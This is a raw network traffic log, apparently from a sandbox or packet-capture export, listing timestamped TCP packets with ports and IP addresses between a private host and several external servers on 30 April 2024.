Apr 30, 2024 07:59:38.213135004 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.213164091 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.214070082 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.214083910 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.214188099 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.214195013 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.214963913 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.214987040 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.215034962 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.215042114 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.215061903 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.215552092 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.215568066 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.215616941 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.215624094 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.215637922 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.215647936 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.215662003 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.215699911 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.215708017 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.215733051 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.216586113 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.216602087 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.216711044 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.216725111 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.217498064 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.217520952 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.217581034 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.217581034 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.217588902 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.217598915 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.217619896 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.217649937 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.217659950 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.217679977 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.218413115 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.218432903 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.218492031 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.218492031 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.218499899 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.219285965 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.219320059 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.219348907 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.219356060 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.219379902 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.219932079 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.219952106 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.219976902 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.219983101 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.219999075 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.220020056 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.220035076 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.220061064 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.220067024 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.220083952 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.220995903 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221015930 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221043110 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.221049070 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221065044 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.221822023 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221857071 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221885920 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.221892118 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221904993 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221913099 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.221925020 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221952915 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.221960068 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.221972942 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.222928047 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.222942114 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.223026037 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.223033905 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.223799944 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.223819017 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.223850965 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.223858118 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.223879099 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.224436998 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.224452019 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.224503040 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.224508047 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.224514961 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.224534035 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.224546909 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.224598885 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.224601984 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.224643946 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.225270987 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.225285053 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.225358963 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.225366116 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.226042032 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.226062059 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.226099968 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.226108074 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.226138115 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.226242065 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.226284981 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.226299047 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.226356030 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.226361990 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.226463079 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.227221012 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.227238894 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.227327108 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.227335930 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.227389097 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.227891922 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.227907896 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.228023052 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.228029966 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.228068113 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.228589058 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.228604078 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.228652954 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.228672028 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.228678942 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.228704929 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.228785992 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.229377031 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.229624987 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.229643106 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.229710102 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.229717970 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.230335951 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.230356932 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.230381012 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.230387926 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.230458975 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.230597973 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.230639935 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.230668068 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.230676889 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.230690002 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.231380939 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.231400013 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.231422901 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.231429100 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.231498957 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.232275009 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232290983 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232368946 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.232377052 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232831955 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232851982 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232877016 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.232882977 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232899904 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232903004 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.232928991 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232959032 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.232966900 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.232978106 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.233839035 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.233855963 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.233876944 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.233884096 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.233901024 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.234694958 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.234711885 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.234775066 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.234786034 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.234786034 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.234793901 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.234813929 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.234831095 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.234890938 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.234894991 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.235672951 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.235692024 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.235723972 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.235730886 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.235754013 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.235759020 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.235773087 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.235789061 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.235794067 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.235831022 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.235888958 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.237035990 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.237051010 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.237092972 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.237099886 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.237108946 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.237117052 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.237131119 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.237160921 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.237166882 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.237185955 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.237261057 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.238065004 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.238081932 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.238126993 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.238137960 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.238137960 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.238147020 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.238178968 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.238261938 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.239027023 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.239041090 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.239067078 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.239072084 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.239084959 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.239784002 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.239808083 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.239840031 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.239847898 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.239876032 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.240091085 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.240147114 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.240149021 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.240159035 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.240206003 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.240223885 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.240228891 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.240252018 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.240278959 CEST	443	49709	104.21.45.138	192.168.2.7
Apr 30, 2024 07:59:38.240636110 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:38.240636110 CEST	49709	443	192.168.2.7	104.21.45.138
Apr 30, 2024 07:59:40.874443054 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 30, 2024 07:59:48.492023945 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:48.492074013 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:48.492142916 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:48.492486954 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:48.492495060 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:48.971178055 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:48.971379042 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:48.976800919 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:48.976835966 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:48.977075100 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:48.978569984 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.024118900 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.433052063 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.433079004 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.433209896 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.433235884 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.483916044 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.664469957 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.664483070 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.664518118 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.664547920 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.664567947 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.664582014 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.664582968 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.664623022 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.664628029 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.664645910 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.664673090 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.703593969 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.703676939 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.895589113 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.895723104 CEST	443	49710	66.90.95.11	192.168.2.7
Apr 30, 2024 07:59:49.895726919 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.895868063 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:49.896050930 CEST	49710	443	192.168.2.7	66.90.95.11
Apr 30, 2024 07:59:52.206876993 CEST	443	49707	104.98.116.138	192.168.2.7
Apr 30, 2024 07:59:52.206985950 CEST	49707	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:53.154548883 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:53.348480940 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:53.348570108 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:53.513573885 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:53.753762960 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:54.928091049 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:54.968225956 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:54.977870941 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.161912918 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.218205929 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.222513914 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.225383043 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.472527027 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541764975 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541785002 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541795969 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541814089 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541826010 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541837931 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541851044 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541862011 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541872978 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.541887045 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.542177916 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.736221075 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736239910 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736252069 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736264944 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736279011 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736288071 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.736291885 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736304998 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736318111 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736330986 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736345053 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736346960 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.736358881 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736366987 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.736371994 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736386061 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736393929 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.736398935 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736412048 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736418962 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.736427069 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736440897 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736442089 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.736454964 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.736462116 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.736496925 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930413008 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930433989 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930445910 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930459023 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930473089 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930491924 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930505991 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930520058 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930532932 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930542946 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930546045 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930560112 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930573940 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930588007 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930599928 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930610895 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930620909 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930629015 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930634975 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930645943 CEST	49711	3344	192.168.2.7	91.92.242.85
Apr 30, 2024 07:59:55.930648088 CEST	3344	49711	91.92.242.85	192.168.2.7
Apr 30, 2024 07:59:55.930665016 CEST	3344	49711	91.92.242.85	192.168.2.7
